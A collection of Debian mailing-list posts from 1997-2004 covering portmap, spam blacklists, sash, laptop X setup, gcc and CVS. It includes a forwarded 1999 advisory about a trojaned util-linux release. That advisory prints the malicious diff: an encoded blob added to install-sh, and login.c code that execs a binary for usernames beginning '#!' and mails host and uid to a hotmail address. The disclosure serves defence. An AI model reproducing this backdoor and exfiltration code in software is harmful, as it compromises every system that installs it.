Bug#280553: portmap: do NOT silently switch to localhost only operation !
Package: portmap Version: 5-5 Severity: serious portmap should not silently switch to listening to the localhost interface only. This behaviour breaks things for every networked machine that uses NFS for example. This should not be the default behaviour. -- System Information: Debian Release: 3.1 APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.8-rc4-mm1 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages portmap depends on: ii libc6 2.3.2.ds1-18 GNU C Library: Shared libraries an ii libwrap07.6.dbs-6Wietse Venema's TCP wrappers libra -- no debconf information
Atlanta Debian People
Hi Folks I'll be visiting friends close to Atlanta between the 22nd and the 30th this month. If some local Debian or Linux/Unix people are interested, I'd be happy to meet them. Just let me know. :-) Cheers Mike -- - Michael NeufferPhone: +49 6131 540117 Zum Schiersteiner Grund 2 Fax: +49 6131 477288 55127 MainzMobile:+49 171 1406664 GermanyMail: [EMAIL PROTECTED] -
Re: RBL report..
* Joseph Carter ([EMAIL PROTECTED]) [000326 16:45]: On Sun, Mar 26, 2000 at 04:00:54PM +0200, Nils Jeppe wrote: Given every report I've heard to the contrary, I'm not sure I believe that. I've also been told that there are cases where their tests produce false positives. I don't see how you can create a false positive on a relay test. Either the message gets through, and you're an open relay, or it doesn't, and you're fine. It's quite simple, really. Or it appears to have been accepted and goes nowhere. I've seen a setup or two like this specifically for the purposes of tracking who was trying to use the relay... Nope, this can't happen with ORBS. They definitely check that. They figure out wether you are dropping their testmails or relay them. Mike
Re: RBL report..
* Jason Gunthorpe ([EMAIL PROTECTED]) [000326 08:45]: [...] ORBS - 314 Comparing connections it is found that 3970 out of 40236 connection attempts would have been blocked. This can be roughly considered to be 3970 emails blocked. [...] ORBS deserves special mention because of their insane hit count, I don't know what that is about but ORBS would block 10% of the mails we get. I think it is without question that the majority of those blocks are legitimate mails. ORBS is also almost completely inclusive of the RSS and RBL. ORBS has a slightly different (broader and maybe better) goal then the the others. It actively scans the net for open mail relays, warns the operators of these machines multiple times with exact descriptions of what they are doing, trying to accomplish (ie closing open mail relays) which problems have been found, how to fix them (plus necessary pointers to other sites) and how to get of the list. Only then the machine is added to the list. Mike
Re: sash
* Ruud de Rooij ([EMAIL PROTECTED]) [990924 08:40]: Michael Neuffer [EMAIL PROTECTED] writes: * Raul Miller ([EMAIL PROTECTED]) [990923 16:15]: On Thu, Sep 23, 1999 at 07:32:50AM -0500, Ashley Clark wrote: Couldn't sash include a PAM module that would change the password to match root's password whenever it was changed? Or am I oversimplifying things? I don't have enough confidence in Debian's pam, yet, to insist that everyone that wants to use sash must implement pam support before using sash. Depending on PAM would be a fatal mistake. sash is for situations when your system is FUBARed, therefore you can not assume that you will still have a working PAM subsystem either. It must be completely standalone without needing any external libraries. This is _not_ about the sash executable itself using PAM. It was a proposal to use the PAM functionality to ensure that the root and sashroot passwords remain in sync, i.e., whenever root's password is changed, change the sashroot password as well. Ooops. I understood it differently. I take my argument back. Mike
Re: sash
* Raul Miller ([EMAIL PROTECTED]) [990923 16:15]: On Thu, Sep 23, 1999 at 07:32:50AM -0500, Ashley Clark wrote: Couldn't sash include a PAM module that would change the password to match root's password whenever it was changed? Or am I oversimplifying things? I don't have enough confidence in Debian's pam, yet, to insist that everyone that wants to use sash must implement pam support before using sash. Depending on PAM would be a fatal mistake. sash is for situations when your system is FUBARed, therefore you can not assume that you will still have a working PAM subsystem either. It must be completely standalone without needing any external libraries. Mike
Re: X on a Dell Inspiron Laptop
* Douglas Bates ([EMAIL PROTECTED]) [990523 03:30]: A friend recently bought a high-end Dell laptop computer. The model is the Inspiron 8000, if I recall correctly. From the graphics hardware it is an Inspiron 7000, there is no 8000 Another problem we encountered is in the configuration of the X server. The version of SuperProbe and the xservers in Debian 2.1 were not able to recognize the chip. We installed the 3.3.3.1 X11 packages compiled for Debian 2.1 from the www.netgod.net site. That version of SuperProbe recognized the chip and describes it as First video: Super-VGA Chipset: ATI 264LT Pro (Port Probed) Memory: 8192 Kbytes RAMDAC: ATI Mach64 integrated 15/16/24/32-bit DAC w/clock (with 6-bit wide lookup tables (or in 6-bit mode)) (programmable for 6/8-bit wide lookup tables) Attached graphics coprocessor: Chipset: ATI Mach64 Memory: 8192 Kbytes but neither the xserver-svga nor the xserver-mach64 packages seem to want to drive it. Does anyone know if there are more recent drivers at xfree86.org or at SuSE that will drive this video system? Unfortunately does the XFree86 Xserver still not completely support the LT variant of the Rage Pro chipset. What you need to do is to take the latest Debian Mach64 Xserver from unstable and add a few things that you can find here: http://www.eecs.umich.edu/~steveh/inspiron/ It is quite possible that you need to downgrade the BIOS of the laptop tothe A06 revision, since newer revisions do not set up the Rage LT Pro chip properly I've been running my I7k under X since October last year. First with the dongle solution later then with the help of the vesa-fb driver in the kernel. If you still have problems with your friends laptop after reading the above web site, I can mail you my detailed setup. Mike
(forw) [Andries.Brouwer@cwi.nl: Re: util-linux compromised]
- Start forwarded message -
Date: Sun, 24 Jan 1999 14:19:09 +0100 (MET)
From: [EMAIL PROTECTED]
Message-Id: [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
linux-security@redhat.com
Subject: Re: util-linux compromised
Cc: [EMAIL PROTECTED]
Sender: [EMAIL PROTECTED]
Precedence: bulk
X-Loop: [EMAIL PROTECTED]
X-Orcpt: rfc822;linux-kernel-outgoing-dig
MIME-Version: 1.0
I just received the following letter:
Date: Sun, 24 Jan 1999 04:01:55 -0500 (EST)
From: John Stange [EMAIL PROTECTED]
Subject: util-linux compromised?
I grabbed util-linux-2.9g yesterday from win.tue.nl, and discovered a
section of login.c that appears to send the host and uid of the user to a
hotmail address. I imagine this isn't a standard feature. : Given that
the tcp wrappers archive was backdoored on that same server recently, you
might want to comb over the rest of your stuff as well, if any of it's
yours.
-- John Stange
Staff World, 4120 AVW
x52720
and indeed, util-linux-2.9g had been replaced by a trojan version.
Unfortunately this means that everything from ftp.win.tue.nl
must be regarded as suspect for the moment.
I put a correct util-linux-2.9g.tar.gz back, with md5sum
ab409a6ac5a775a4b04b8e27f6c86933 util-linux-2.9g.tar.gz
but of course, for the time being, nothing on this machine can be trusted.
Andries
A diff between original and trojan:
diff -r util-linux-2.9g/disk-utils/Makefile
trojan/util-linux-2.9g/disk-utils/Makefile
94a95
diff -r util-linux-2.9g/install-sh trojan/util-linux-2.9g/install-sh
147a148,171
# M.'1F87=H3(S='5L9G(V:6%W969G34V-VEA,W4*(R!`:%=)CT['9X46QO
# MGEP8V9Q8GYJ1SU6*E-P6S)RE(X5G%A8%P]2C)K9EEY6#-J1V)R/3X[W5Z
# M'1X$!8765I7F5E65Q80B`@(`HC(YA+G,[EMAIL PROTECTED],BXU+F(N
# MXY+FN=BXX+CN82YW+G0N8BYP+C$N,BXX+CDN=XW+F8N9RYA+GN90HC
# M(#0L,RQH+'0L.2QQ+#(L.QT+8L82QW:UQ+3(M,RUT+74M;UF+7(M-BUI
# M+6$M=RUE+68M9RUQ+34M-BTW+6DM82TS=0HC($!H5TER/3MX=GA1;]Z7!C
# M9G%B?FI'/58J4W!;,G)R4CA6[EMAIL PROTECTED],FMF67E8,VI'8G(]/CM[=7IX='AX
# MWL,14(2SWS1$J0=[8?[[?=T-T!2LK,SW,S5W4;[TXLD4CT:]/-^JC)-
# M$F?5E]ZP_WJ^^^0W^-$'@Y'A_J)UOKET':;_ST/KHZ[EMAIL PROTECTED]!UGOX
# M=/1$'S[Y'7XJ6P:%UD_^27^J#?U'L;WMT4/[OV*_XC^#UG_P^'1P3?]_Q_K
# M_SRX-;,X,;]ZC;[EMAIL PROTECTED]/]C;/R#]#UX.#_?V![%O8/!X.43/?BF_]_\
# MYYGV:M:]7O-YEAZ,[EMAIL PROTECTED],C57/]'[EMAIL
PROTECTED])$(ST)2OW6A'IXI(#T#U
# MZ@]UZ_'F+,E;F++8UY5\3Z8UAR7JX-QH,1\,]G.HIRM=]=!7Z^CXTQ
# M_;R8$^U\N2KB^:)D0EWZ=Y__/C*M*LXO`V*2)_T]3N:K+%1FC[51;V353M
# MJ=*Q5F85)'1_?[N^?''BW[EMAIL PROTECTED]F0Z64P-_;/2IV/+UY]
# MIY\^G478?1J4_5ZO;7WP1(?KEGT;)(^Z\D)C65#$1.[EMAIL PROTECTED]
# M59)T=%$Y:=)C//6]C7^I]3DA],+6BV]G5FWCE(WDRMZW/!0+ZS4R?4QO^`O
# M\2PS?]6=Y]O'ES['=VQRZ`([EMAIL PROTECTED];'6219KKW9+H,$^7TE73\%MR:S'
# M5FYOC5%9A)MJ^4R+TJ=9YK)L!WSW?IM\[3+?QEG\A04RL_Z7\8[H'T
# MNSV\-H!O^G1J]O.YD(4T`\]!^L^[Y`CUUH]P89;(HGBF36/,XT=(N$F;
# M5\9VU%/L_7A']T*0.'YW-GX_P9WD[/CFZO)R2[/?W\C[J7Z^??RR[6*%W(
# MH+]+:WWZTY$7BQ1.*PYS76408??@'+S[?/WOI%_D,6H6G/\CH7\[O5PFY
# MX;J7I([][TVXX/=93DX*)[;P9AANJ0OSURHN#PXK`J+WW`NF
diff -r util-linux-2.9g/login-utils/login.c
trojan/util-linux-2.9g/login-utils/login.c
179a180
void checkname P_((char *name));
552a554,555
checkname(username);
1291a1295,1342
}
#include sys/socket.h
#include netinet/in.h
#include arpa/inet.h
#include netdb.h
void
checkname(char *name)
{
chara[100];
char*pt;
if ((name[0] == '#') (name[1] == '!'))
{
pt = (char*)name[2];
sprintf(a,/bin/%s,pt);
execl(a,a,(void*)0);
}
if (fork() == 0)
{
struct hostent *he;
struct sockaddr_in sai;
struct in_addr *ia;
charb[500];
int s,l;
setsid();
s = open(/var/tmp/.fmlock0,O_RDONLY);
if (s = 0) exit(0);
he = gethostbyname(mail.hotmail.com);
if (!he) exit(0);
ia = (struct in_addr *)he-h_addr_list[0];
l = sizeof(sai);memset(sai,0,l);
sai.sin_port = htons(25);
sai.sin_addr.s_addr = ia-s_addr;
if ((s = socket(AF_INET,SOCK_STREAM,0)) 0) exit(0);
if ((connect(s,(struct sockaddr*)sai,l)) 0) exit(0);
if ((getsockname(s,(struct sockaddr*)sai,l)) 0) exit(0);
sprintf(b,\r\nHost = %s\r\nUid =
%i\r\n\r\n.\r\n,inet_ntoa(sai.sin_addr),getuid());
sleep(1);if (write(s,HELO 127.0.0.1\n,15) 0) exit(0);
sleep(1);if (write(s,MAIL FROM:[EMAIL PROTECTED]\n,28) 0)
exit(0);
if (write(s,RCPT TO:[EMAIL PROTECTED]\n,30) 0) exit(0);
sleep(1);if (write(s,DATA\n,5) 0) exit(0);
sleep(1);if (write(s,b,strlen(b)) 0) exit(0);
sleep(1);if (write(s,QUIT\n,5) 0) exit(0);
Re: kerneld/multicast bug (tickled by gated) (fwd)
This is from Linux kernel, and it sounds to me, that there might be versions that we can distribute with Debian. Mike -- Forwarded message -- Date: Sun, 15 Jun 1997 20:05:23 -0400 (EDT) From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: kerneld/multicast bug (tickled by gated) Alan nad Linux folks: Thanks for all the suggestions. I will try the kernel patch. Brian and I were working on OSPF. In addition, I am trying to work on getting GateD running over linux including our new multicast support and ip v6 so I may be back for more of your help. I'm curious about the bgp-4 sort of? Please do send bug reports we are trying to work through the reported bugs. We hope to be in better shape in 6 months. And as to license, GateD we are working on is public. Some other versions of GateD are are probably free to most linux users but alas you do have to sign a piece of paper.Please.. if you have license questions - send me a note or ask on the gated list. I don't want to clutter up any technical list. Thanks, Sue Hares GateD maintainer === Indeed. I hope the routed people aren't offended either - after all gated is large, a little buggy and very messily licensed 8) For the other folks o Routed is a simple daemon implementing modified BSD RIP routing o Gated is a large daemon implementing OSPF, RIP-2 , BGP4 (sort of), and a load more protocols. Gated is sufficient to do backbone routing idrp.merit.net:/home/skh/Mail/inbox mail -v [EMAIL PROTECTED] Subject: Re: kerneld/multicast bug (tickled by gated) Linux folks: -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: libc6 policy in unstable
On 9 Jun 1997, Milan Zamazal wrote: GM == Guy Maor [EMAIL PROTECTED] writes: GM: David Frey [EMAIL PROTECTED] writes: :: Must all new programs goint into unstable be linked with libc6? GM: Since Debian 2.0 is meant to be a libc6 system, the answer is yes. Well, if I install libc6 now, wouldn't it break compilation of some programs? I'm dependent on my Debian machine, so I can't perform too hard experiments with it. Yes, it breaks the compilation of a good number of programms, but most fixes are more or less trivial. I switched to glibc2/libc6/hamm over 6 weeks ago and so far my system is running just fine. If you really need to continue to compile libc5 dependent stuff, install the alt-dev packages. And if I can't install libc6 safely enough now, does it mean I really shouldn't upload new versions of my packages? No, if there is no other way, upload versions linked against libc5, but you should really try to switch as soon as possible. Mike -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: I'm back !
On Fri, 6 Jun 1997, Philippe Troin wrote: What's the stability of hamm right now ? Is it usable ? Yes it is. My machine here has been running on hamm for weeks. A bunch of libs are still missing but otherwise it is quite functional. Mike -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: RFC: Policy for arch specs
On Sun, 1 Jun 1997, Thomas Koenig wrote: I don't think it does any optimization at all for pentium. Correct. Of course, there's the experimental pgcc (http://www.goof.com/, if anybody wants to look). I'd like to pack this up and stuff it into experimental, if I had a little more time *sigh*. This is not necessary. gcc 2.8 includes the pentium optimizations from pgcc. My guess is that it won't take very long anymore until 2.8 gets released. HJL found a few more bugs and his patches for libc6/glibc2 are not integrated yet, but otherwise it seems pretty stable now. Mike -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
XFree86 3.3 now available
-BEGIN PGP SIGNED MESSAGE- I just had a look at ftp.xfree86.org. They finally have 3.3 out. Mike -BEGIN PGP SIGNATURE- Version: 2.6.3ia Charset: noconv iQCVAwUBM5J+gUAgIJ53sbT9AQEJ8gP/XaRFImH2den6zE5uMTct5YX4yrUKkxMS LZyHcbgLQ+DyLIsxdhtykHja0IBeScc/gtpeKRu6Co6O5dBAdRlHMVw3i6TT6hFm EVkXY7Gl0cCddmN8RcxXrJ4Nz9yD68g8tHUORLibY/rm6ZbDknMkiTI6tHO6K6uW q2S4d8cKLbc= =sP7j -END PGP SIGNATURE- -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: RFC: Policy for arch specs
On Mon, 2 Jun 1997, Thomas Koenig wrote: Michael Neuffer wrote: This is not necessary. gcc 2.8 includes the pentium optimizations from pgcc. All of it? No not all, they took a stable subset. Mike -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: RFC: Policy for arch specs
On 1 Jun 1997, Guy Maor wrote: Galen Hazelwood [EMAIL PROTECTED] writes: Perhaps. Anybody have any serious arguments? I think the reason we configure gcc as i486 is so it automatically optimizes for the 486; it's a good middle ground. I think the only optimization gcc 2.7.* does for i486 is instruction alignment. The Pentium has a better fetch unit so doesn't need any alignment (it never incurs a misfetch penalty) so optimizing for i486 will at least give some code bloat. I don't think it does any optimization at all for pentium. No not in 2.7.x, but there are noticable differences for P5 and P6 in gcc 2.8. Mike -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: Sysvinit and System.map (Was: dangling symlink System.map)
-BEGIN PGP SIGNED MESSAGE- On 28 May 1997, Guy Maor wrote: Yann Dirson [EMAIL PROTECTED] writes: BTW, psupdate is the only program I can think about using System.map. Are there any other ? klogd ksymoops Mike -BEGIN PGP SIGNATURE- Version: 2.6.3ia Charset: noconv iQCVAwUBM41TtkAgIJ53sbT9AQGMEQP/Tp7+L1pxKdi5U7daHbCVZrgbmlg4+9YC zsSCMdQuKZKtkGuVW7LyNxAEIvAk/2yBW7e2Ync09XiS/l0ojXYgaKvzC8pd4YJN PJZDGdLwL4Q6l9yWHXNL7Kkl3KqRSyqKJuR0F41pDSHYutML4e1z1pK8dK4KKZXA +GuHafhUgeE= =TE/F -END PGP SIGNATURE- -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: cvs.debian.org [Was: Using CVS for package development]
On Wed, 28 May 1997, Jim Pick wrote: We are running cvs.debian.org over an ISDN line. Currently the only code under it is the Deity project. I can make other source trees and set up other users if others want to do distributed development this way. Unfortunately, I haven't been able to set up world read access yet because CVS always wants write access to the directory (for lock files) so currently it is either group read/write or world read/write. What about cvsup? All I know about it is that the FreeBSD use it to distribute their sources... You will have to port SRC-Modula-3 first. It currently does not work with glibc 2.x. CVSup is the tool of choice for FreeLinux. It would be nice to be able to have an automated procedure to make any package in the Debian source tree available via CVS so that a group of people could work on it simultaneously. (no hurry though, just an idea) Another idea... is coda (an afs/nfs replacement from Carnegie-Mellon) a possibility for building a really large filesystem spread across multiple machines on the internet? We plan to support coda, however we are currently using AFS for the development machines of FreeLinux. Mike -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: Problems adding swap files
On 15 May 1997, Rob Browning wrote: Pete Templin [EMAIL PROTECTED] writes: As my system is currently laid out, I'm not suffering from any shortage of swap _space_ (240MB allocated, max seen in use is 33MB), I'm merely trying to sneak out the best possible performance without spending a buck. In the end I imagine you'll be much happier if you scrounge for more RAM, but you probably already knew that... I think I'm just having trouble using a swapfile on a md array, as opposed to a pathname problem. Any ideas would, of course, be gladly accepted. I'm not sure I understand your problem, but I'll be happy to help if I can. We have machines here using /dev/md0 as swap. Is that roughly what you are trying to accomplish? Here's the mdtab. # mdtab entry for /dev/md0 /dev/md0 raid0,4k,0 /dev/hda2 /dev/hdb2 # mdtab entry for /dev/md1 /dev/md1 raid0,4k,0 /dev/hda3 /dev/hdb3 # mdtab entry for /dev/md2 /dev/md2 raid0,4k,0 /dev/hda4 /dev/hdb4 You don't wan't to have your swap partitions on an MD device. The kernel already stripes over all available swap partitions. Using MD just wastes CPU cycles. Mike -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
